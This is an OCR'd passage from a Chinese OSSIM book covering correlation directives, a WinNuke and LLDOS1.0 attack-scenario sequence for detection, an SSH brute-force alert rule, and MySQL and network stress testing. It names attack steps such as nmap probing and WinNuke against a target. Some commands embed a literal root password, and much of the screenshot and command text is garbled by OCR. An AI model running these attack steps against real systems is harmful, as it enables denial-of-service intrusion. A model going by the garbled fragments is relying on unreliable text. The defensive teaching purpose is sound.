Occurrence="1"” from-"192.168.11.100" to-"ANY" port from-"ANY" 
port to-"ANY" 
plugin id-"1525" plugin sid-"1,7,9"» 
«rules» 
<rule type-"monitor" name-"Ping Baidu Server in order to check internet 
connection" 
reliability-"10" from-"www.baidu.com" to-"www.baidu.com" 
plugin id-"2009" plugin sid-"1" condition-"gt" value-"0" interval-"20" 
time out-"120" /» 
«/rules» 
«/directive» 


关键 字段 解释 : 


(1) Detector: 检测 器 规则 ， 自 动 收集 从 代理 发 来 的 记录 ， 包 括 Snort, Apache, 
Arpwatch 等 。 

(2) Monitor: 监控 器 负责 查询 Ntop 服务 发 来 的 数据 和 会 话 。 

(3) Name: 事件 数据 库 中 的 规则 名 称 。 

(4) Reliability: 可 靠 性 。 

(5) Plugin id: 插件 ID， 查看 更 多 插件 ID 请 参考 第 1 章 的 表 1-7. 

(6) Plugin sid: 插件 子 ID 号 ， 分 配给 每 个 插件 事件 的 子 ID， 比 如 Snort 这 个 插件 ID 号 
为 1001， 而 1501 就 是 它 的 子 ID 号 ， 代 表 Apache 事件 的 响应 代码 ， 当 然 不 止 这 一 个 。 

C7) Condition: 条 件 参 数 和 下 面 6 个 逻辑 有 关系 ， 必 须 符合 的 逻辑 条 件 匹 配 规 则 如 下 : 
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eq: 等 于 (Equal ) . 

ne: 不 等 于 (Notequal ) 。 

lt: 小 于 (Lesser than) 。 

gt: 大 于 (Greater than ) 。 

le: 小 于 等 于 ( Lesser or equal ) 。 
ge: 大 于 等 于 (Greater or equal) 。 


(8) Interval: 间隔 ， 这 个 值 类 似 于 time_out， 用 于 监控 类 规则 。 
又 如 OSSIM 的 例子 , 我 们 查看 /etc/ossim/server/alienvault-scan.xml 这 个 扫描 攻击 场景 的 策 
略 文 件 ， 描 述 的 结构 就 像 逻 辑 树 一 样 ， 基 本 格式 如 下 : 
Gree:level 1 
Yellow : level2 
Orange:level3 
Red: level 4 


下 面 给 出 部 分 代码 内 容 ， 如 图 4-72 所 示 。 


port_from="ANY" port.to 


y different time_out='"36 


time_ou 


图 4-72 ”攻击 扫描 指令 示例 

(9) Occurrence， 表 示 发 生 次 数 ， 默 认为 1， 攻 击 场景 不 同 ， 这 个 值 也 不 一 样 。 这 个 值 越 
大 , 越 要 引起 管理 员 的 注意 ,这 里 表示 的 发 生 次 数 , 也 就 是 计算 具有 相同 的 “from、to、port_from、 
port_to、plugin_id、plugin_sid” 发 生 次 数 ， 以 便 代入 到 关联 模式 中 的 下 一 个 规则 中 。 

这 个 数值 在 基于 规则 的 关联 分 析 中 非常 有 用 ， 例 如 当 目 标 IP 地 址 发 生 的 异常 行为 ， 事件 
数量 发 生 的 频率 达到 了 一 定数 值 时 ( 某 人 针对 该 系统 发 动 攻击 )，OSSIM 会 发 出 预警 提示 ， 管 
理 员 就 可 以 有 针对 性 地 开展 深入 调查 。 当 然 对 源 IP 也 适用 。 

From 表示 来 源 ， 源 地 址 有 以 下 几 种 形式 : 

€ ANY, 4£X IP 地 址 都 可 以 匹配 。 

€ 小数 点 和 数字 的 IPv4 形式 。 

€ ”以 过 号 隔 开 的 IPv4 地 址 ， 不 带 掩 码 。 

© ”可 以 使 用 任意 数目 的 IP 地 址 ， 中 间 用 运 号 隔 开 。 
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€ “网络 名 称 ， 可 以 使 用 网 络 中 事先 定义 好 的 网 络 名 称 。 
@ ”相对 值 ， 这 种 情况 比较 复杂 ， 可 以 引用 上 条 规则 中 的 IP 地 址 ， 例 如 : 
> 1:SRC_IP 表示 引用 前 一 条 规则 的 源 地 址 。 
» 2:DST IP 表示 引用 前 第 二 条 的 目的 地 址 作为 源 地 址 。 
© — 否定 形式 ， 可 以 使 用 地 址 的 否定 形式 如 : 71192.168.150.200, HOME NET" , 


如 果 HOME NET= 192.168.150.0/24， 将 匹配 一 个 C 类 子 网 排除 192.168.150.200。 


(10) Time out: 表示 超时 ， 其 等 待 一 定时 间 以 匹配 规则 ， 时 间 超 出 则 匹配 失败 。 

(11) Port from/Port to: 表示 来 源 /目的 端口 ，Port_from 可 以 是 ANY, Port to 可 以 是 一 
个 端口 号 或 一 个 逗号 分 隔 的 端口 序列 ，1:DST_PORT, 也 可 以 否定 端口 , 例如 ,port=“!22,25”。 
注意 : dst ip 表示 目的 ip 地址， 而 dst port 则 表示 目的 端口 号 ，ipaddr 本 地 ip 地 址 。 

(12) Protocol (协议 ): 可 以 使 用 以 下 字符 串 : TCP, UDP, ANY. 


在 OSSIM 系统 运行 前 ， 必 须 为 已 知 的 攻击 场景 建立 对 应 的 树 形 规则 集 ， 在 启动 时 ， 系 统 
将 预先 定义 好 的 指令 读 入 内 存 ， 在 接收 到 一 个 事件 (event) 后 ， 先 将 该 事件 与 之 前 已 经 匹配 、 
而 还 没有 匹配 完 的 指令 中 的 规则 进行 匹配 ， 然 后 再 与 其 他 规则 匹配 。 那 么 在 一 个 复杂 的 攻击 场 
景 中 ， 一 条 Event 就 会 与 多 条 规则 匹配 ， 如 果 此 事件 的 风险 值 超过 预先 设 定 的 阔 值 ， 则 将 其 
alarm 属性 设 为 真 ， 并 在 Alarm 界面 中 显示 。 

例如 : plugin_id="1001" plugin_sid="2008609,2008641"。 

在 OSSIM 4.6 系统 中 ， 有 385 个 数据 源 ， 这 里 ID=1001， 代 表 Snort 检测 插件 ， 产 品类 型 
属于 IDS， 主 要 适用 于 Snort 规则 ， 其 他 插件 ID 还 记得 吗 ? 如 果 忘 了 请 返回 本 书 第 1 章 ， 查 
看 “插件 & 功 能 ”对 应 表 。 

实际 上 在 OSSIM 系统 中 ，Snort 插件 ID 范围 是 1001—2145. Æ OSSIM 4.6 版 中 ， 
Configuration 一 Threat Intelligence— Data Source 可 以 查看 到 所 有 数据 源 。 如 图 4-73 所 示 。 


THREAT INTELLIGENCE ADMINISTRATION 


DEPLOYMENT 


4-73 ”数据 源 分 类 


在 OSSIM 的 关联 引擎 运行 之 前 ， 必 须 为 所 有 已 知 的 攻击 场景 建立 对 应 的 树 形 指令 ， 这 也 
是 它 的 核心 价值 的 体现 。 在 OSSIM 启动 时 ， 系 统 会 将 所 有 预先 定义 好 的 指令 读 入 内 存 ， 在 接 
收 到 一 个 directive event 后 ， 先 将 该 事件 指令 中 的 规则 匹配 ， 然 后 再 与 其 他 指令 的 规则 匹配 ， 
注意 一 个 事件 可 以 与 很 多 指令 中 的 规则 匹配 。 


280 


第 4 章 OSSIM 关联 分 析 技 术 


4.9.3 攻击 场景 构建 

黑客 攻击 时 往往 带 有 目的 性 ， 不 会 随意 扫描 , 而 有 目的 的 攻击 总 有 个 顺序 , 可 以 用 一 组 攻 
击 行为 来 描述 。 下 面 是 针对 DNS 服务 器 实时 WinNuke 攻击 的 例子 ，WinNuke 攻击 又 称 带 外 传 
输 攻 击 一 种 拒绝 服务 攻击 )， 被 攻击 的 目标 端口 通常 是 139、138、137。 其 过 程 如 图 4-74 所 
7e 


htta ck1 | enslookup<target> 


htacio | *nmap-PT139 «target» 


þrtacka Winnuke <target> 


图 4-74 Winnuke 攻击 场景 
这 个 攻击 包含 相互 关联 的 4 个 步骤 ， 细 节 大 家 可 以 参考 NASL 脚本 winnuke.nasl， 检 查 
DNS 服务 器 是 否 受到 了 攻击 影响 。 
另外 ， 我 们 可 以 使 用 一 个 攻击 场景 测试 数据 集 LLDOS1.0， 其 中 包含 了 一 个 复合 攻击 过 
程 ， 大 致 攻击 序列 分 为 5 个 阶段 : 
(1) 通过 IP sweep 进行 活动 主机 探测 ; 
(2) 使 用 Sadmind Ping 进行 sadmind daemon 服务 端口 扫描 , 探测 可 能 存在 的 sadmind 漏 
洞 主机 《〈 例 如 Solaris 8); 
(3) 利用 主机 上 的 sadmind 漏洞 进行 系统 入 侵 ， 获 得 N 台 主 机 的 root 权限 ; 
(4) 在 攻破 的 主机 上 安装 用 户 DDoS 攻击 的 木马 ; 
(5) 利用 被 控 主 机 对 目标 发 起 DDoS 攻击 。 


以 上 攻击 场景 可 描述 为 : 
IP Sweep-—RPC port scan--sadmin overflow--Remote login-DDoS 


有 关 这 种 攻击 防范 案例 ， 读 者 可 以 参考 《Unix/Linux 网 络 日 志 分 析 与 流量 监控 》 一 书 7.2 
节 内 容 。 


49.4 报警 聚合 计算 方法 
下 面 我 们 分 析 通 过 IP 来 聚合 一 类 安全 告警 ， 这 里 用 到 源 地 址 或 者 目标 地 址 的 相似 度 计算 
来 实现 报警 聚合 。 


(1) IP 聚合 的 计算 
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本 例 中 源 地 址 和 目标 地 址 的 TP 地 址 用 十 进 制 和 二 进 制 表示 采用 下 面 的 方法 计算 相似 度 。 


IP1: 192.168.1.9 11000000.10101000.00000001.00001001 
IP2; 192.168.2.3  11000000.10101000.00000010.00000011 
Mask 255.255.255.0 11111111.11111111.11111100.00000000 


IP1 和 IP2 之 间 的 距离 用 Mask 掩 码 中 1 的 位 数 表 示 ， 故 它们 的 距离 为 22， 如 果 Mask 为 
32 说 明 两 个 IP 完全 相同 ， 如 果 Mask 为 0 说 明 两 个 IP 绝对 不 可 能 是 同一 子 网 的 P， 通 过 公式 
可 以 将 这 种 相似 度量 化 为 0~1 的 小 数 。 


量化 后 我 们 就 可 以 写 规则 了 ， 例 如 : 


Rule (Similarity[1]SRC-1; SRC IP 
DST-1; DST IP 
Similarity[2]-(1,0.75] 
Occurrence-100 

ci 


| 网 SRC 和 Similarity[1] 表 示 要 求 与 这 个 节点 匹配 的 报警 的 源 亿 与 该 指令 根 节点 的 源 亿 相同 ， 
”  DST 和 Similarity[2]=0.75 ， 表 示 目 标 IP 和 根 节点 目标 IP 距离 大 于 24， 即 
| Mask-255.255.255.0, Occurrence-100 表示 关联 引擎 至 少 收 到 100 条 以 上 的 报警 才 匹 配 。 


(2) 端口 扫描 攻击 事件 告警 的 聚合 计算 
这 种 方法 和 IP 相似 度 计算 相同 原理 ， 对 于 攻击 中 使 用 到 端口 也 可 以 采用 这 种 方法 ， 具 体 
规则 不 再 举例 。 


自 定 义 策略 实现 SSH 登录 失败 告警 

为 防止 用 户 反复 登录 暴力 破解 密码 ， 我 们 一 方面 需要 加 固 SSH 服务 ， 另 一 方面 还 需要 监控 
SSH 登录 情况 ， 对 于 非法 登录 一 定 要 记录 在 案 ， 一 旦 SSH 登录 失败 的 次 数 超过 事先 约定 的 阔 值 ， 
系统 便 报 营 。 要 实现 这 一 目的 , 可 利用 OSSIM 关联 规则 ， 观 察 一 段 时 间 内 发 生 的 事件 ， 如 果 超 过 
闵 值 ， 警 报 就 会 触发 。 例 如 关联 规则 匹配 “在 5 秒 内 登录 失败 5 次 的 事件 ” 这 会 被 显示 为 报警 。 
如 果 在 5 秒 内 登录 失败 次 数 达 40 次 呢 ? 这 也 会 被 归 为 同一 类 报警 ， 而 不 会 重复 多 次 。 

关联 规则 与 病毒 特征 库 不 同 ，OSSIM 内 置 的 规则 提供 了 基本 的 分 析 思 路 ， 大 家 在 日 常 使 
用 中 切 不 可 生 搬 硬 套 ， 要 根据 自身 环境 调整 ， 在 理解 已 有 的 规则 后 ， 根 据 所 包含 的 攻击 场景 ， 
推理 条 件 来 编写 新 的 规则 。 当 然 规则 并 不 是 一 成 不 变 ， 也 要 随 着 业务 的 变化 而 相应 改变 规则 。 

接 下 来 ， 介 绍 OSSIM 4 系统 下 的 一 个 实用 功能 ， 就 是 可 以 为 网 络 的 SSH 服务 器 提供 多 次 
失败 自动 报警 功能 ， 实 现 方法 是 在 Configuration— ThreatIntelligence— Directives 菜单 下 选择 
“New directive” 按 钮 ， 可 以 设置 SSH 登录 失败 报警 策略 ， 例 如 图 4-27 中 ， 新 建 一 条 策略 名 
称 为 “ssh_attack”， 设 定 登录 失败 就 视 为 风险 存在 ， 然 后 通过 最 大 尝试 次 数 为 3 次 , 指定 报警 。 
详细 步骤 如 图 4-75 ~ 图 4-80 所 示 。 
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NAME FOR THE DIRECTIVE 
SSH Attack. 

TAXONOMY 
went — (Delivery E Nack 


Susegy (Erureforce Autherticator. 


Method: (3 


PRIORITY 


NEW DIRECTIVE 


F Rule name 


NAME FOR THE RULE 


图 4-75 添加 指令 、 输 入 规则 名 称 


NEW DIRECTIVE 


# Rule name »Plugin 


Choose between Event Types Selection or Taxonomy 


@ tvent types © Taxonomy 


SELECT A PLUGIN 


Search a plugin name or ID: [ssh 


4-76 选择 事件 类 型 


M me rame » Plugin. > vent Type 
Choose between Event Sub-Types Selection or Taxonomy 
@ tvent Sub-Types © Taxonomy 
PLUGIN SIGNATURES 

1 items selected Remove all - = Addall 

1- SSHd: Failed password. = : Failed publickey * 

Invata user * 

Mega! user + 

|: Root login refused. * 

|: User not allowed because listed in DenyUsers + 


|: Login sucessful, Accepted password 
|: Login sucessful, Accepted publickey 
|: Bad protocol version identification 


10 ~ SSHd: Did not receive identification string + 


11 - SSHd: Received disconnect 


12 - SSHd: Authentication refused: bad ownership or modes. 


m 
4-717 选择 一 种 或 多 种 事件 的 子 类 型 


EPY SEEEN EARE ANY AGATE 
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RE 
OT 
Soci petii — 
Da S 
H ssets 
a caos Lo 
ac pem 


source $ S Network Groups DemhAmow 


Ey Lr 


4-9 ” 设 定 策略 可 靠 性 


w User Contributed [2 directives) 


E attack attack 
b V UR P Swern compromise, rueforce Authentication, 3 


$^ SSH.Attack 
v VEA Delivery & Attack, Bruteforce Authentication, 3 


* RULES. Left Click to edit this field. 3? 


NAME — RELIABUTY TIMEOUT OCCURRENCE FROM TO DATASOURCE  EVENTTYPE — |.] ACTION 


"o EEUU mm 70. i 


» DIRECTIVE INFO 
图 4-80 设 定 发 生 此 类 事件 的 次 数 


设置 好 以 后 ， 单 击 确定 按钮 ， 我 们 可 以 在 列表 中 查看 到 如 下 策略 信息 。 如 图 4-81 所 示 。 
这 里 Directive 代表 指令 含义 ， 实 际 上 可 以 理解 为 添加 一 条 用 于 检测 SSH 攻击 的 指令 。 
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Correlation Directives round 1,880 directives in the system 
©} New Directive (9 Test Directives “$ Restart Server Search a directive name: 


v User Contributed 0 directive] 


Ey attack attack 
v V S E V^ System Compromise, Sruteforce Authentication, 3 


v RULES 
NAME RELIABILITY TIMEOUT OCCURRENCE FROM 7o DATA SOURCE 
ssh artackcrule 5 None 3 * ANY 9 ANY ssh(4003) 


» DIRECTIVE INFO 
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EVENT TYPE — [.] ACTION 


* Sps1 Moe 4 


图 4-81 设置 SSH 攻击 检测 条 件 
当 策 略 设置 完毕 ， 一 定 要 单 击 “Restart Server” 按 钮 ， 使 设置 生效 。 图 4-82 所 示 内 容 就 


是 SSH 客户 端 登录 失败 后 在 SIEM 控制 台 上 的 提示 。 


EVENTS coureo MELINE 
SHOW TREND GRAPH Ml Of 
SIGNATURE w DATE GMT-5:00 a SENSOR SOURCE DESTINATION RISK 
| Host operating system change 2014-12-26 19:44:18 — VirtualUSMAllinOne — Host-192-168-11-232. Host-192-168-11-232. Ce 
2 .| ossec SSHD authentication falled- 2014-12-23 11:40:55. VirtualUSMAllinOne — Host-192-168-11-40:56064- VirtualUSMAllinOne- 上 9 
| ossec SSHD authentication failed. 2014-12-23 11:40:55. VirtualUSMAllinOne — Host-192-168-11-40:56064 VirtualUSMAllInOne. I 日 


SSHd: Falled password 


了 SSHd:Failed password 


2014-12-23 11:40:55 — VirtualUSMAllinOne — Host-192-168-11-40:56064 — — VirtualUSMAllInOne:22 


2014-1223 11:40:54 —— VirtualUSMAllinOne 。 Most-192-168-11-4056064 —— VirtualUSMAllInOne:22 


图 4-82 SIEM 检测 到 SSH 登录 失败 记录 


最 后 ， 使 用 OSSIM 的 日 志 筛选 功能 就 知道 所 有 的 登录 失败 告警 有 多 少 。 这 对 于 掌握 服务 
器 的 安全 情况 非常 有 帮助 。 但 并 不 是 所 有 报警 信息 都 代表 有 攻击 行为 ， 其 中 有 不 少 属于 误 报 ， 


还 需要 经 验 来 综合 判断 。 


4. 1 1 小 结 


日 志 关联 引擎 是 OSSIM 日 志和 事件 分 析 的 核心 。 本 章 从 关联 分 析 入 门 开始 讲 起 ， 逐 步 介 
绍 了 多 种 关联 分 析 技术 ， 最 后 介绍 了 OSSIM 的 通用 关联 检测 规则 ， 运 用 实例 给 读者 展示 了 关 


联 引擎 的 基本 使 用 方法 。 
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58 
< OSSIM 系 统 监 ; 测 工具 > 


从 本 章节 可 以 学 习 到 : 
Linux 性 能 评估 
常用 监测 工具 
OSSIM 压力 测试 
性 能 检测 方法 
性 能 分 析 工 具 
影响 MySQL 性 能 的 因素 

OSSIM 在 实验 室 测 试 过 程 中 ， 往 往 数据 量 小 、 数 据 种 类 单一 。 我 们 往往 只 在 意 功能 的 实 
现 ， 而 很 难关 注 到 性 能 的 薄弱 之 处 ， 等 系统 上 线 ， 实 际 运行 一 段 时 间 后 ， 才 发 现 系统 的 性 能 出 
现 问题 ,这 时 再 来 考虑 提高 系统 性 能 则 要 花费 更 多 的 精力 ， 所 以 需 在 系统 投入 生产 之 前 做 好 各 
项 测试 和 准备 工作 。 对 于 系统 评估 和 监控 的 常用 工具 和 方法 ， 读 者 需要 掌握 。 尤 其 是 OSSIM 
系统 在 高 并 发 、 大 数据 量 的 访问 情况 下 ， 我 们 的 系统 会 不 会 出 现状 况 。 


Linux 性 能 评估 


当 我 们 搭建 好 系统 后 ， 由 于 硬件 、 软 件 或 是 网 络 环境 等 问题 都 会 对 应 用 产生 影响 。 作 为 系统 
工程 师 , 就 是 要 适应 各 种 环境 因素 的 变化 来 评估 应 用 系统 可 能 出 现 的 各 种 异常 情况 , 并 定位 故障 、 
优化 系统 以 解决 这 些 比 较 难 解决 的 问题 。 性 能 监测 是 系统 优化 过 程 中 的 重要 一 环 ， 如果 不 清楚 性 
能 瓶颈 在 哪里 ， 怎 么 优化 呢 ? 所 以 找到 性 能 瓶颈 是 性 能 监测 的 目的 ， 也 是 系统 优化 的 关键 。 


5.1.1 性 能 评估 工具 

系统 运行 良好 的 时 候 恰恰 也 是 各 项 资源 达到 了 一 个 平衡 任何 一 项 资源 的 过 度 使 用 都 会 造成 
平衡 体系 的 破坏 ， 从 而 造成 系统 负载 极 高 或 者 响应 迟缓 ， 如 CPU 过 度 使 用 、 系 统 响应 变 慢 等 。 
内 存 耗 尽 又 会 造成 虚拟 内 存 使 用 ， 使 用 虚拟 内 存 又 会 造成 磁盘 VO 增加 和 CPU 开销 增加 ， 故 优 
化 、 监 测 、 测 试 通常 是 连 在 一 起 的 一 个 循环 , 而 且 是 长 期 的 过 程 , 通常 监测 的 子 系统 有 以 下 这 些 : 

€ CPU 

€ Memory 
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@ 10 
€ Network 


这 些 子 系统 互相 依赖 ， 了 解 这 些 子 系统 的 特性 ， 监 测 这 些 子 系统 的 性 能 参数 ， 及 时 发 现 可 能 
会 出 现 的 瓶颈 对 系统 优化 很 有 帮助 。 综合 运用 常见 的 性 能 监控 工具 , 对 我 们 维护 系统 非常 有 帮助 ， 
下 面 通过 ps. head. awk 命令 ， 按 顺序 从 高 到 低 显 示 CPU 内 存 占用 情况 ， 如 图 5-1 所 示 。 


awk ’ {print 4,S11}’ Ihead -1 && ps aux lawk ’ {print 
r 1 


图 5-1 用 命令 行 工 具 显示 CPU 内 存 情况 


监控 这 些 子 系统 有 一 些 更 专业 工具 , 每 个 工具 都 侧重 某 一 个 领域 , 所 以 读者 需要 善于 将 多 
种 工具 配合 使 用 ， 以 发 挥 更 大 作用 。 常 用 的 监测 工具 如 表 5-1 所 示 。 


表 5-1 常用 监测 工具 


工具 简单 介绍 

toj 查看 进程 活动 状态 以 及 一 些 系 统 状况 ， 启 动 top， 按 ShiftHN， 可 根据 内 存 CPU, PID, 
SWAP 等 参数 进行 实时 排序 

vmstat 查看 系统 状态 、 硬 件 和 系统 信息 等 

iostat 查看 CPU 负载 、 硬 盘 状况 

sar 查看 系统 状况 

mpstat 查看 多 处 理 器 状况 

netstat 查看 网 络 状况 

iptraf 实时 网 络 状况 监测 

tcpdump 抓 取 网 络 数据 包 ， 详 细 分 析 

mpstat 查看 多 处 理 器 状况 

tcptrace 数据 包 分 析 工 具 

netperf 网 络 带 宽 工 具 

dstat 综合 工具 ， 结 合 了 vmstat, iostat, ifstat, netstat 几 个 命令 的 功能 

slabtop 显示 内 核 片 缓存 信息 


本 章 将 介绍 OSSIM 中 各 种 常用 工具 ， 待 大 家 熟练 掌握 之 后 就 可 以 灵活 运用 。 性 能 调 优 对 
新 手 而 言 难度 较 大 , 不 同 的 系统 ， 其 用 途 也 不 同 , 要 找到 性 能 瓶颈 , 需要 知道 系统 有 什么 应 用 、 
有 什么 特点 ， 如 网 站 服务 器 对 系统 的 要 求 肯定 和 文件 服务 器 不 一 样 ， 所 以 区 分 不 同系 统 的 应 用 
类 型 很 重要 ， 通 常 应 用 可 以 分 为 两 种 类 型 : 
€ ”1/0 相关 lO 相关 的 应 用 通常 用 来 处 理 大 量 数 据 , 需要 大 量 内 存 和 存储 频繁 IO d 
作 读 写 数 据 ， 而 对 CPU 的 要 求 则 较 少 ， 大 部 分 时 候 CPU 都 在 等 待 硬盘 ， 如 数据 库 
服务 器 、 文 件 服务 器 等 。 
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€ ”CPU 相关 ，CPU 相关 的 应 用 需要 使 用 大 量 CPU， 如 高 并 发 的 Web/Mail 服务 器 、 数 
据 包 抓 包 分 析 等 都 可 被 视 作 CPU 相关 的 应 用 。 


5.1.2 ”查找 消耗 资源 的 进程 

在 大 负载 服务 器 中 , 我 们 经 常 需要 查 明 最 消耗 资源 的 进程 , 可 通过 “top -c”、“pstree -Aup”、 
“ps -ef” 查 出 ， 如 可 疑 进程 PID 为 41002， 用 下 面 命令 找到 对 应 的 进程 名 : 

#ps -p 41002 -o cmd 


如 果 “ps -ef” 也 无 法 查 出 问题 ， 还 可 用 strace 命令 : 
例如 : #strace -o strace psef.log -f ps -ef 


OSSIM 压力 测试 


前 几 章 讲 到 OSSIM 系统 由 若干 开源 安全 系统 所 组 成 ， 对 于 这 样 一 个 复杂 系统 ， 部 署 完毕 
后 ， 系 统 到 底 怎 么 样 、 稳 定性 如 何等 一 系列 问题 ， 我 们 需要 经 过 一 些 测试 才能 知晓 。 通 常 ， 对 
防火 墙 、 入 侵 检测 的 测试 和 评估 有 着 严格 的 测试 方法 和 流程 ， 下 文 仅 对 OSSIM 系统 中 常见 的 
日 志 流量 和 网 络 数据 包 流 量 进行 仿真 ， 另 外 还 包括 MySQL 的 压力 测试 。 


5.2.1. 软 硬 件 测试 环境 


© 千 光 交换 机 一 台 ， 交 换 机 必须 具有 端口 SPAN 功能 ， 本 次 测试 中 OSSM 服务 器 与 
SPAN 口 连接 ， 使 得 它 能 够 监听 到 其 他 端口 的 测试 数据 流 。 

© KA OSSIM43 系统 的 测试 服务 器 一 台 。 

e 高 性 能 PC 机 2 台 ， 分 别 模拟 两 台 客户 端 ， 操 作 系统 Linux. Windows 均 可 。 这 里 选 
用 BT5 (Back Track， 以 后 简称 BT) ， 拓 扑 如 图 5-2 所 示 。 


g 


sim Sener 


图 5-2 测试 环境 
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5.2.2 ”测试 项 目 

(1) 正常 流量 模拟 

实时 流量 负载 的 内 容 是 可 变 的 ,此 外 网 络 流量 的 生成 应 该 可 以 根据 网 络 的 拓扑 情况 进行 灵 
活 地 设置 。 网 络 流量 可 以 根据 需要 增 大 或 减 小 ， 可 以 在 单位 时 间 内 按 需 提高 流量 或 减少 流量 。 
真实 的 网 络 环境 中 , 有 些 应 用 层 服务 会 使 用 得 比较 多 , 比如 HTTP 服务 、Samba 服务 及 FTP 服 
务 。 

我 们 在 每 台 测试 机 上 都 用 BTS 光盘 引导 ,各 自 启动 Apache, Samba, FTP, SSH, MySQL 
服务 器 。 为 了 模拟 一 定数 量 的 访问 ， 可 以 使 用 ab 和 webbench 工具 。 


(2) 一 定 压力 流量 模拟 

这 种 压力 测试 不 同 于 以 往 , 是 指 测试 所 使 用 的 数据 流 中 含有 部 分 攻击 特征 , 数据 流 每 个 数 
据 包 都 可 以 触发 IDS 的 检测 匹配 过 程 ， 但 最 后 会 因为 匹配 失败 而 放弃 该 包 。 这 使 得 相对 于 在 
同样 传输 速度 的 普通 背景 流量 下 ,IDS 将 承受 更 大 的 压力 。 由 于 OSSIM 系统 中 启动 了 NIDS 和 
HIDS 这 两 种 检测 方式 ， 它 在 检测 某 个 报 文 时 ， 除 了 对 报 文 头 部 分 析 ， 还 会 在 报 文 负载 中 检测 
是 否 带 有 攻击 特征 字符 串 。 然 而 随机 生成 的 报 文 负载 有 可 能 包含 有 攻击 特征 串 而 发 出 报警 , 在 
这 种 带 有 一 定 压力 的 测试 中 ，OSSIM 的 CPU 利用 率 和 内 存 占用 会 有 不 小 的 提高 。 在 这 种 带 有 

- 定 压力 测试 中 的 测试 时 间 一 般 在 半 小 时 内 即 可 了 解 整体 情况 。 


(3) 攻击 流量 模拟 

这 种 测试 是 模拟 服务 器 在 被 攻击 时 ，OSSIM 系统 是 否 能 及 时 发 现 并 分 析 流 量 。 在 这 种 情 
况 下 ，OSSIM 服务 器 面临 过 载 的 风险 最 大 。 这 里 要 注意 的 是 ， 本 次 试验 需要 生成 大 量 的 攻击 
数据 包 向 OSSIM 系统 发 送 。 测 试 中 的 攻击 数据 流 并 不 需要 是 真实 的 攻击 行为 。 所 以 这 种 数据 
都 是 伪 攻 击 数 据 ， 攻 击 包 只 是 起 到 触发 DS 报警 的 作用 。 


5.2.3 测试 工具 
1. 日 志 产 生 器 


为 了 测试 OSSIM 系统 是 否 能 够 准确 地 接收 并 解析 Syslog 消息 我 们 使 用 一 个 模拟 Syslog 
Server 工具 Syslog-Slogger 对 系统 发 送 Syslog 消息 Syslog-Slogger 是 一 个 基于 JAVA 的 命 
令 行 工具 ， 用 户 能 够 通过 它 的 properties 文件 设置 发 送 的 目的 地 址 、 发 送 时 间 间 隔 、 消 息 数量 
等 ， 该 工具 是 一 个 操作 简单 、 使 用 方便 的 Syslog Server。 以 下 显示 了 Syslog-Slogger 模拟 器 产 
生 的 几 条 syslog 消息 。 

#syslogs generated 1060 espMessage Stats 

$PIX-3-211001:Memory allocation Error [1] 

$PIX-5-106100:access-list acl-inside permitted udp inside/192.168.120.2«101» 
-> out side/192.168.150.20«137» hit-cnt 1 «first hit» [1] 


$PIX-5-106100:access-list acl-inside permitted udp inside/192.168.120.3«100» 
-»out side/«192.168.150.21«137» hit-cnt 10 «first hit» [1] 
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$PIX-1-101004(Primary)Failover cable not connected (other unit) [1] 

$PIX-3-105006(Primary)Link status down on interface inside [2] 

$PIX-5-109012:Authen Session End:user abc,sid session num,elapsed num seconds 
[1] 


以 上 日 志 是 由 Syslog-Slogger 模拟 器 产生 的 syslog 消息 。 这 款 工 具 下 载 位 置 为 
http://sourceforge.net/projects/syslog-slogger/. 


2. 数据 包 生 成 器 Hyenae 

这 里 介绍 一 款 能 自动 生成 各 种 数据 包 的 开源 工具 hyenae， 它 是 一 种 高 度 灵 活 和 平台 独立 
的 网 络 数据 包 发 生 器 ， 下 载 地 址 为 http://packetstormsecurity.com/UNIX/scanners/hyenae-0.35-2.targz。 

Hyenae 还 支持 一 个 基于 Qt 的 前 端 HyenaeFE。 它 在 BackTrack 4/5 下 可 以 直接 编译 后 运行 ， 
安装 比 Debian Linux 系统 中 要 简单 。 我 们 利用 这 款 工具 可 以 模拟 大 量 的 网 络 流量 ,如 图 5-3 所 
示 。 如 果 不 差 钱 ， 可 以 购买 FLUKE 和 ES 网 络 通 〈 网 络 分 析 仪 ) 来 进行 测试 ， 用 这 款 开源 工 
有 具 和 Fluke 测试 仪 都 可 以 对 七 层 的 应 用 进行 发 包 测 试 。 


图 5-3 Hyenae 使 用 
3. MySQL 测试 
mysqlslap 是 MySQL 自 带 的 基准 测试 工具 ， 它 采用 Perl 编写 ， 类 似 Apache Bench 负载 产 
生 工 具 , 语法 简单 , 容易 使 用 。 该 工具 可 以 模拟 多 个 客户 端 同时 并 发 地 向 服务 器 发 出 查询 更 新 ， 
并 能 给 出 了 性 能 测试 数据 而 且 提 供 了 多 种 引擎 的 性 能 比较 。 
实例 1: 


#mysqlslap -u root -pXhSksvpjKj -concurrency-1000 -iterations-1 
-auto-generate-sql -auto-generate-sql-load-type-mixed 
-auto-generate-sql-add-autoincrement -engine-myisam -number-of-queries-10 


-debug-info 


本 次 测试 以 1000 个 并 发 线程 ， 测 试 1 次 ， 自 动 生成 SQL 测试 脚本 、 读 写 更 新 混合 测试 ， 
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自 增长 字段 ， 测 试 引擎 为 myisam， 共 运行 10 次 查询 ， 输 出 CPU 资源 信息 显示 结果 (命令 


NI 


数 的 含义 大 家 可 以 使 用 mysqlslap --help KER) 以 及 操作 截图 如 图 5-4 所 示 。 


图 5-4 mysqlslap 测试 实例 1 


实例 2: 

使 用 系统 自 带 的 脚本 测试 ， 增 加 auto_increment, int4 和 char35 列 ,测试 2 种 引擎 myisam 
和 innodb。 读 的 性 能 分 别 用 50. 200. 400 个 客户 端 对 服务 器 进行 测试 ， 总 共 200 个 查询 语句 
执行 20 次 查询 。 操 作 结 果 如 图 5-5 所 示 。 


图 5-5 mysqlslap 实例 2 


从 显示 的 第 一 项 结果 看 ，50 个 并 发 客户 端 , 平均 每 个 客户 端 4 个 查询 ， 20 次 查询 中 最 少 
的 时 间 是 0.124 秒 、 最 多 0.263 秒 、 平 均 0.170 秒 。 

实例 3: 

这 里 我 们 可 以 使 用 OSSIM 系统 中 自 带 的 SQL 脚本 ， 例 如 : 


#mysqlslap -create-/usr/share/doc/ossim-mysql/contrib./plugins/sap.sql 
-query-/usr/share/doc/ossim-mysql/contrib/plugins/sap.sql 
-concurrency-50,100,200 -iterations-20 -engine-myisam,innodb 
-socket-/var/run/mysqld/mysqld.sock -uroot -pXhsksvpjKj 


操作 结果 如 图 5-6 所 示 。 
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5-6 E SQL 脚本 运行 结果 


5.2.4 IDS 测试 工具 Nidsbench 

